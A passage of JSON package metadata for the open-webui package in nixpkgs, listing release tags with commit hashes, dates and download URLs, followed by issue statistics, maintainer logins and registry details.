i/open-webui/tar.gz/v0.3.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"b0724811dfdb70883c112c20e05dda46707e0330","kind":"commit","published_at":"2024-06-27T20:38:44.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"9e4dd4b86f77653b59dc1fa97fe3f72e8252b359","kind":"commit","published_at":"2024-06-17T05:52:44.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"8f3c9b391be312c72c1a621135fd3cbe33fc0d15","kind":"commit","published_at":"2024-06-12T18:21:44.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"c41b33c9c0722c84055a833802611f8ee39609d3","kind":"commit","published_at":"2024-06-12T09:14:37.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"3933db2c91e635da52a28a9e7e2927f551b2fee6","kind":"commit","published_at":"2024-06-10T20:53:56.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"75d455ac8fc64f741607613c2277a02e28228a3c","kind":"commit","published_at":"2024-06-10T02:09:28.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"96a004d4d8289db1dea83a322f26ab01be3db3fc","kind":"commit","published_at":"2024-06-10T01:11:53.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.0/manifests"},{"name":"v0.2.5","sha":"dbb83f9824154480908e77fa4562d9fbe73a5de4","kind":"commit","published_at":"2024-06-05T17:06:11.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"f28877f4db2a136f26c495e033f1d2b4ea1b405c","kind":"commit","published_at":"2024-06-04T04:29:13.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"14646e84ea5e9d85fbb27a557ca14fb241cc373b","kind":"commit","published_at":"2024-06-03T20:06:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"5be97b81d61c571eb6758bf7b3d2ee85a09d2d02","kind":"commit","published_at":"2024-06-03T01:27:36.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"cfc78dedf0024ecb97a5090825af2698524c9d71","kind":"commit","published_at":"2024-06-02T21:08:43.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"72354e06a759075024d6be6bc6a8e717ec29d823","kind":"commit","published_at":"2024-06-02T05:03:02.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.0/manifests"},{"name":"v0.1.125","sha":"be5534c655f6cb3cc54c079de3f19d671e7a172b","kind":"commit","published_at":"2024-05-19T20:16:36.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.125","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.125","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.125","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.125","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.125/manifests"},{"name":"v0.1.124","sha":"b8d7fdf16e57deaf7faaa4dad7c2c5666e8b18ed","kind":"commit","published_at":"2024-05-08T17:54:33.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.124","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.124","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.124","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.124","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.124/manifests"},{"name":"v0.1.123","sha":"38ff3209ad2a57d8adb61cd597a7a5f55737ab25","kind":"commit","published_at":"2024-05-02T20:10:28.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.123","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.123","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.123","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.123","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.123/manifests"},{"name":"v0.1.122","sha":"92c98eda2e7340bc7c8f32d33bc49cec8498b1bb","kind":"commit","published_at":"2024-04-28T01:29:10.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.122","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.122","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.122","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.122","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.122/manifests"},{"name":"v0.1.121","sha":"748cb7d4460d38e73bb94260d2f78a98f56b7bf4","kind":"commit","published_at":"2024-04-24T19:31:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.121","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.121","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.121","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.121","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.121/manifests"},{"name":"v0.1.120","sha":"22c50f62cbbe9445bc8ea00695310ed740ad3789","kind":"commit","published_at":"2024-04-21T00:41:00.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.120","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.120","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.120","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.120","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.120/manifests"},{"name":"v0.1.119","sha":"851754700a4d4c90602c57564076521940d88fca","kind":"commit","published_at":"2024-04-16T22:12:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.119","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.119","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.119","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.119","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.119/manifests"},{"name":"v0.1.118","sha":"0399a69b73de9789c4221acedea70d528e1346c4","kind":"commit","published_at":"2024-04-10T22:41:12.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.118","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.118","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.118","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.118","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.118/manifests"},{"name":"v0.1.117","sha":"46774aa5cdbf4e894776978be60311210a6d0b32","kind":"commit","published_at":"2024-04-04T04:43:17.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.117","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.117","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.117","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.117","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.117/manifests"},{"name":"v0.1.116","sha":"3b0cb7945f5c9dbe55d5f76720ddf4e475c11169","kind":"commit","published_at":"2024-03-31T08:17:32.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.116","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.116","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.116","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.116","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.116/manifests"},{"name":"v0.1.115","sha":"ac294a74e7bc5f080970c049c656506e36f9407b","kind":"commit","published_at":"2024-03-24T23:20:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.115","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.115","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.115","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.115","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.115/manifests"},{"name":"v0.1.114","sha":"2fa94956f4e500bf5c42263124c758d8613ee05e","kind":"commit","published_at":"2024-03-21T02:34:22.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.114","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.114","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.114","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.114","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.114/manifests"},{"name":"v0.1.113","sha":"621719c6ac504e1c217fda3e445375a1d20802a3","kind":"commit","published_at":"2024-03-18T18:02:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.113","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.113","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.113","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.113","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.113/manifests"},{"name":"v0.1.112","sha":"5ce421e7faf79f8d7a28fd7cebe6fdc445c4146e","kind":"commit","published_at":"2024-03-15T20:49:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.112","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.112","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.112","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.112","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.112/manifests"},{"name":"v0.1.111","sha":"89634046e721c972eb24bd5115bd9eff77513d7a","kind":"commit","published_at":"2024-03-10T22:00:56.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.111","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.111","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.111","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.111","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.111/manifests"},{"name":"v0.1.110","sha":"8ed5759d0e9424f87d01fe3f8013116c4ba2004f","kind":"commit","published_at":"2024-03-07T04:32:24.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.110","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.110","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.110","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.110","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.110/manifests"},{"name":"v0.1.109","sha":"92e21acb4cfa8fb91c56df2903d7fc33448f7aae","kind":"commit","published_at":"2024-03-06T20:40:28.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.109","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.109","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.109","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.109","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.109/manifests"},{"name":"v0.1.108","sha":"eb51ad14e4caafda1c9fd24c4945044b8776a7a3","kind":"commit","published_at":"2024-03-03T03:25:17.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.108","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.108","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.108","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.108","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.108/manifests"},{"name":"v0.1.107","sha":"6c70d0f770ce4b0acf8d2a33eb7c0f27ffbed631","kind":"commit","published_at":"2024-03-02T07:05:50.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.107","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.107","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.107","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.107","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.107/manifests"},{"name":"v0.1.106","sha":"a181b2b63ba4f263e1683b087194e2f431960525","kind":"commit","published_at":"2024-02-28T04:11:43.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.106","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.106","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.106","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.106","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.106/manifests"},{"name":"v0.1.105","sha":"6df2505bf0352a7580b33f17ce6844afe04fb7be","kind":"commit","published_at":"2024-02-26T05:53:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.105","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.105","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.105","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.105","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.105/manifests"},{"name":"v0.1.104","sha":"3c10c3b928097035655e913eaf0e5dfc900f0f25","kind":"commit","published_at":"2024-02-25T21:05:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.104","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.104","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.104","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.104","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.104/manifests"},{"name":"v0.1.103","sha":"02fb517bbe0e40bf8a10df88d9c021f69ffe9ce3","kind":"commit","published_at":"2024-02-25T19:01:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.103","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.103","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.103","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.103","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.103/manifests"},{"name":"v0.1.102","sha":"4a47833f838088a0309edad2f85ff247b2ad6e00","kind":"commit","published_at":"2024-02-23T03:34:09.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.102","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.102","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.102","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.102","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.102/manifests"}]},"repo_metadata_updated_at":"2026-08-22T22:02:18.489Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{},"purl":"pkg:nix/open-webui?channel=unstable","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/open-webui","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/open-webui","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/open-webui/dependencies","status":null,"funding_links":["https://github.com/sponsors/open-webui"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T20:01:05.824Z","issues_count":5524,"pull_requests_count":5040,"avg_time_to_close_issue":780187.9958294717,"avg_time_to_close_pull_request":413054.62309368193,"issues_closed_count":2158,"pull_requests_closed_count":4131,"pull_request_authors_count":1353,"issue_authors_count":3582,"avg_comments_per_issue":0.9797248370745837,"avg_comments_per_pull_request":1.165873015873016,"merged_pull_requests_count":2385,"bot_issues_count":2,"bot_pull_requests_count":306,"past_year_issues_count":432,"past_year_pull_requests_count":520,"past_year_avg_time_to_close_issue":664005.3636363636,"past_year_avg_time_to_close_pull_request":1521209.3157894737,"past_year_issues_closed_count":176,"past_year_pull_requests_closed_count":323,"past_year_pull_request_authors_count":188,"past_year_issue_authors_count":335,"past_year_avg_comments_per_issue":2.048611111111111,"past_year_avg_comments_per_pull_request":1.2596153846153846,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":27,"past_year_merged_pull_requests_count":91,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/issues","maintainers":[{"login":"silentoplayz","count":178,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/silentoplayz"},{"login":"Classic298","count":97,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Classic298"},{"login":"dannyl1u","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dannyl1u"},{"login":"Silentoplayz","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Silentoplayz"},{"login":"justinh-rahb","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/justinh-rahb"},{"login":"ayanahye","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ayanahye"},{"login":"jackthgu","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jackthgu"},{"login":"andrewbbaek","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andrewbbaek"},{"login":"bdsumon4u","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bdsumon4u"},{"login":"matgla","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matgla"},{"login":"byg1004","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byg1004"},{"login":"GryBsh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GryBsh"},{"login":"pagoru","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pagoru"},{"login":"mohswell","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mohswell"},{"login":"MickWang","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MickWang"}],"active_maintainers":[{"login":"Classic298","count":97,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Classic298"},{"login":"silentoplayz","count":64,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/silentoplayz"},{"login":"andrewbbaek","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andrewbbaek"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/open-webui/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/open-webui/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/open-webui/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/open-webui/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/open-webui/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/open-webui/codemeta","maintainers":[{"uuid":"shivaraj-bh","login":null,"name":"Shivaraj B H","email":"sbh69840@gmail.com","url":"https://github.com/shivaraj-bh","packages_count":17,"html_url":null,"role":null,"created_at":"2026-03-06T16:14:19.995Z","updated_at":"2026-03-06T16:14:19.995Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/maintainers/shivaraj-bh/packages"},{"uuid":"codgician","login":null,"name":"codgician","email":"codgician@outlook.com","url":"https://github.com/codgician","packages_count":14,"html_url":null,"role":null,"created_at":"2026-03-06T16:14:20.059Z","updated_at":"2026-03-06T16:14:20.059Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/maintainers/codgician/packages"}],"registry":{"name":"nixpkgs-unstable","url":"https://channels.nixos.org/nixos-unstable","ecosystem":"nixpkgs","default":true,"packages_count":154149,"maintainers_count":4919,"namespaces_count":0,"keywords_count":3244,"github":"NixOS","metadata":{"funded_